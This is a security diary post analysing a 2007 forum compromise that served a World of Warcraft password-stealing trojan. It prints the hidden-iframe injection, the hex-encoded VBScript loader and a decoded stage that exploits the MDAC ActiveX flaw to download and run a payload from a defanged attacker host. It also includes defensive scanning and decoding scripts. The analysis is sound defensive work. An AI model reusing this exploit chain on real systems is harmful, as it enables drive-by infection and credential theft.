



Non-malicious compromise pointing to a benign VBScript!

Published: 2007-08-28
Last Updated: 2007-08-28 12:55:22 UTC
by Maarten Van Horenbeeck (Version: 3)

Note: please tread carefully here. While we've obfuscated all malicious links, some of them are still live on the internet. Over the weekend we have been working with anti-virus vendors as well as the regional CERT team to have the issue resolved, but we haven't been quite as successful as we had hoped. This attack doesn't merely apply to the site mentioned, but spreads out over hundreds of compromised sites, so you may want to filter the malicious URL mentioned below.

At least if you believe everything your neighborhood webmaster tells you... Early last week, the forum of the website of Leuven, a major student town in Belgium, got compromised. National press reported the compromise occurred through so-called SQL infection (sic), after which links to a .cn web server were added. In an interview, an IT representative of the local government stated that the "hack was not malicious. No data on the website was removed, altered or stolen".

Reason enough for the Internet Storm Center to have a second look. Apparently several pages on the forum were altered to contain a script tag to:
hxxp://www xvgaoke.cn /ms/ltxs.js
 
This Javascript routes you to another page using a hidden iframe:
document.write("<ifra me width='0' height='0' src='hxxp ://www xvgaoke. cn/ms/ltxs.htm'></ifra me>");
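The two injection patterns described so far, an extra script tag pulling code from a foreign host and a zero-size iframe, are easy to sweep a site's own pages for. The following scanner is an added example written for this diary, not tooling from the ISC or from the compromised site; the HTML sample and the host names in it (forum.example, injected.example) are constructed, and the site's own host name is passed in as an assumption.

```python
"""Scan HTML for injected external <script src> tags and hidden <iframe>s.
Added example using only the standard library; the sample page is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectionScanner(HTMLParser):
    """Collect external script sources and hidden iframes from one page."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Attribute values may be None for valueless attributes.
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname
            # A relative src has no hostname and is served by the site itself.
            if host and host.lower() != self.site_host:
                self.findings.append(("external-script", a["src"]))
        elif tag == "iframe":
            w = a.get("width", "").strip().rstrip("px")
            h = a.get("height", "").strip().rstrip("px")
            style = a.get("style", "").replace(" ", "").lower()
            # Drive-by frames are made invisible: 0/1 pixel or hidden via CSS.
            hidden = (w in ("0", "1") or h in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))


def scan_html(html, site_host):
    """Return a list of (kind, url) findings for one HTML document."""
    parser = InjectionScanner(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed forum page: one legitimate script, one injected script tag,
# one hidden iframe and one ordinary visible iframe.
SAMPLE_PAGE = """<html><body>
<h1>Forum</h1>
<script src="/js/forum.js"></script>
<script src="http://injected.example/ms/ltxs.js"></script>
<iframe width='0' height='0' src='http://injected.example/ms/ltxs.htm'></iframe>
<iframe width="600" height="400" src="http://forum.example/embed"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, url in scan_html(SAMPLE_PAGE, "forum.example"):
        print(kind, url)
```

Run over a crawl of the site's own pages, the two finding kinds point straight at the pages that were modified; a relative script path or a normally sized iframe is not reported.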
 
The resulting page contains a piece of VBScript (reduced in size below for brevity), a hyperlink to Google and a counter hosted on a Chinese web server.
 
abc = "006F006E0020006500720072006F0072...65006E0022002C0030000D000A"
cde = "006F006E0020006500720072006F007...00065006E0022002C0030000D000A"
Function decode(x)
    For i = 1 To Len(x) Step 4
        If Mid(x, i, 4) = "0D0A" Then
            decode = decode & vbCrLf
        Else
            decode = decode & Chr(Int("&H" & Mid(x, i, 4)))
        End If
    Next
End Function
execute (decode(abc))
execute (decode(cde))
 

Naturally, we want to have a look at what this code does. It's easy to execute VBScript on the desktop using the Windows Script Host (WSH) and its tool wscript: the content can simply be copied into a .vbs file and run. However, that's not what we want to do here, since the script calls EXECUTE on the decoded content. Not a good idea.

So, let's change these commands around a bit. WScript exposes an Echo method that displays content on screen in a message box:

wscript.echo (decode(abc))
wscript.echo (decode(cde))
 
Executing the script through wscript then results in some more VBScript, which includes the following code:
 
on error resume next
m1="object"
m2="classid"
m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
m4="Microsoft.XMLHTTP"
m5="Shell.Application"
MircoLong="hxxp:// www xvgaoke. cn/ms/ltxs.vbs"
set MircoLonge=MircoLongc.createobject(m5,"")
MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0
 
We can see a reference to BD96C556-65A3-11D0-983A-00C04FC29E36. This is the CLSID of a Microsoft Data Access Components (MDAC) control. On April 12th, 2006, a Microsoft advisory reported a significant vulnerability in an ActiveX control that is part of the ActiveX Data Objects (ADO), the control referenced in the exploit code above. This vulnerability is still commonly exploited today as part of so-called drive-by exploits.
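Swapping EXECUTE for echo works, but it still means running attacker-supplied VBScript under WSH. The same decoding can be done offline, and the decoded stage checked for the indicators discussed above (the MDAC CLSID, Shell.Application, Microsoft.XMLHTTP, ShellExecute, embedded URLs) without a Windows box at all. The script below is an added example, not the diary's or the attacker's code; it mirrors the decode() routine from the page and generalises it into a small indicator scan. The second-stage sample and the host payload.example in it are constructed for the test.

```python
"""Decode the 4-hex-digit-per-character VBScript payload without executing it,
then flag known indicators in the decoded text. Added example; sample is constructed."""
import re

# Indicators the diary calls out in the decoded stage. The CLSID is the MDAC
# ActiveX control referenced in the Microsoft advisory.
INDICATORS = {
    "mdac-clsid": re.compile(r"BD96C556-65A3-11D0-983A-00C04FC29E36", re.I),
    "shell-application": re.compile(r"Shell\.Application", re.I),
    "xmlhttp": re.compile(r"Microsoft\.XMLHTTP", re.I),
    "shellexecute": re.compile(r"\bShellExecute\b", re.I),
    "url": re.compile(r"https?://[^\s\"']+", re.I),
}


def decode_vb_hex(blob):
    """Mirror the VBScript decode(): 4 hex digits per character, 0D0A -> CRLF.
    The literal 0D0A branch only fires on a mis-aligned blob; the aligned
    chunks 000D 000A decode to CRLF through the Chr() branch anyway."""
    out = []
    for i in range(0, len(blob), 4):
        chunk = blob[i:i + 4]
        if chunk.upper() == "0D0A":
            out.append("\r\n")
        else:
            out.append(chr(int(chunk, 16)))
    return "".join(out)


def encode_vb_hex(text):
    """Inverse of decode_vb_hex; used here only to build the constructed sample."""
    return "".join(f"{ord(c):04X}" for c in text)


def find_indicators(script):
    """Return {indicator: [matches]} for every indicator present in script."""
    hits = {}
    for name, rx in INDICATORS.items():
        matches = rx.findall(script)
        if matches:
            hits[name] = matches
    return hits


def analyse(blob):
    """Decode a hex blob and report indicators found in the result."""
    decoded = decode_vb_hex(blob)
    return decoded, find_indicators(decoded)


# Constructed second stage modelled on the decoded output shown in the diary;
# payload.example is a placeholder, not the live host.
SAMPLE_STAGE2 = (
    'on error resume next\r\n'
    'm3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"\r\n'
    'm5="Shell.Application"\r\n'
    'MircoLong="http://payload.example/ms/ltxs.vbs"\r\n'
    'MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0\r\n'
)
SAMPLE_BLOB = encode_vb_hex(SAMPLE_STAGE2)

if __name__ == "__main__":
    decoded, hits = analyse(SAMPLE_BLOB)
    print(decoded)
    for name, matches in hits.items():
        print(f"{name}: {matches}")
```

Feeding the real abc and cde strings from a captured page to analyse() gives the decoded VBScript and the list of indicators in one step, with nothing ever handed to a script interpreter.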
 
Without being noticed, the code then downloads ltts.exe from the same server and executes it on the victim system. On August 25th, the malware had a SHA1 hash of c1cbee89ba1033b8e739067eab086f70b476c5aa and was about 50 kb in size. Five days after the compromise took place, the binary was detected by 9 out of 32 anti-virus solutions. Note that it's quite common for people running such malicious web servers to change their malcode every so often, so as to reduce the risk of detection by anti-virus.
 
Once run on a system, the software drops a number of executables and installs one of them as a Userinit value under the Winlogon registry key. This makes for one of those pesky, difficult-to-remove pieces of spyware. In the end its final goal appears to be the gathering of World of Warcraft authentication credentials.
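The Userinit value is a handy place to look when triaging a suspected infection: on a clean system it names only the stock userinit.exe in system32, so anything appended to or replacing it deserves a look. The check below is an added example, not from the diary; it parses an exported Userinit value rather than reading the registry live, so it runs anywhere. The system root path and the sample values (including dropped_sample.exe) are constructed assumptions, not file names taken from this malware.

```python
"""Triage check for the Userinit persistence described above.
Added example: parses a Userinit registry value (HKLM\\Software\\Microsoft\\
Windows NT\\CurrentVersion\\Winlogon) and reports entries other than the
stock system32\\userinit.exe. Sample values are constructed."""
import ntpath

# Assumed system root for an XP/2003-era host; pass another if it differs.
DEFAULT_SYSTEM_ROOT = r"C:\WINDOWS"


def _normalise(entry, system_root):
    """Strip quotes and whitespace, expand %SystemRoot%, lower-case for compare."""
    e = entry.strip().strip('"').strip()
    if e.lower().startswith("%systemroot%"):
        e = system_root + e[len("%systemroot%"):]
    return e.lower()


def suspicious_userinit_entries(value, system_root=DEFAULT_SYSTEM_ROOT):
    """Return the comma-separated entries of a Userinit value that are not
    the stock userinit.exe in system32. The stock value ends with a trailing
    comma, so empty entries are skipped. A bare 'userinit.exe' without a
    directory is reported as well, so the analyst looks at where it resolves."""
    expected_dir = ntpath.join(system_root, "system32").lower()
    flagged = []
    for raw in value.split(","):
        e = _normalise(raw, system_root)
        if not e:
            continue
        directory, name = ntpath.split(e)
        if name != "userinit.exe" or directory != expected_dir:
            flagged.append(raw.strip())
    return flagged


# Constructed sample values: the stock entry, one with an appended dropper,
# and one where the stock entry has been replaced outright.
SAMPLES = {
    "stock": r"C:\WINDOWS\system32\userinit.exe,",
    "appended": r"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\dropped_sample.exe,",
    "replaced": r"C:\WINDOWS\system32\drivers\svch0st.exe",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(label, "->", suspicious_userinit_entries(value) or "clean")
```

The same parsing applies to values collected from many hosts at once (for instance from exported registry hives), which is how a spyware variant that installs itself this way shows up across a fleet.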
 
If you're still wondering why these are so prized, run a quick Google query. Online games have recently seen the rise of so-called Real Money Transactions: yes, real money that you can lose by getting compromised and that others can gain. Blizzard, the WoW developer, strongly discourages this practice, but something of value to a player can always be sold on other markets.

So this leaves me wondering why exactly this was a non-malicious compromise?

UPDATE: By popular request, here is the current AV recognition according to Virustotal. At least one of the two droppers is detected by:

Webwasher-Gateway   6.0.1/20070828          found [VBScript.Vulnerable.gen!High (suspicious)]
Authentium          4.93.8/20070828         found [HTML/IFrame]
F-Prot              4.3.2.48/20070828       found [HTML/IFrame]
Norman              5.80.02/20070828        found [JS/OnlineGames.A]

The actual executable is identified as malicious by:

AntiVir             7.4.1.63/20070828       found [TR/Crypt.FKM.Gen]
Avast               4.7.1029.0/20070827     found [Win32:WOW-FD]
CAT-QuickHeal       9.00/20070825           found [(Suspicious) - DNAScan]
DrWeb               4.33/20070828           found [Trojan.PWS.Wow]
eSafe               7.0.15.0/20070826       found [Suspicious Trojan/Worm]
F-Secure            6.70.13030.0/20070828   found [Trojan-PSW.Win32.WOW.sp]
Fortinet            2.91.0.0/20070828       found [W32/WoW!tr.pws]
Ikarus              T3.1.1.12/20070828      found [Trojan-PWS.Win32.WOW.pu]
Kaspersky           4.0.2.24/20070828       found [Trojan-PSW.Win32.WOW.sp]
NOD32v2             2488/20070828           found [Win32/PSW.WOW.SP]
Norman              5.80.02/20070828        found [W32/Wow.BJL]
Sunbelt             2.2.907.0/20070825      found [VIPRE.Suspicious]
Symantec            10/20070828             found [Infostealer.Wowcraft]
TheHacker           6.1.9.175/20070828      found [Trojan/PSW.WOW.sp]
VBA32               3.12.2.3/20070828       found [suspected of Trojan-PSW.Game.9 (paranoid heuristics)]
Webwasher-Gateway   6.0.1/20070828          found [Trojan.Crypt.FKM.Gen]

In order to prevent clients from being infected, you could consider blocking traffic to the xvgaoke.cn domain.

--
Maarten Van Horenbeeck
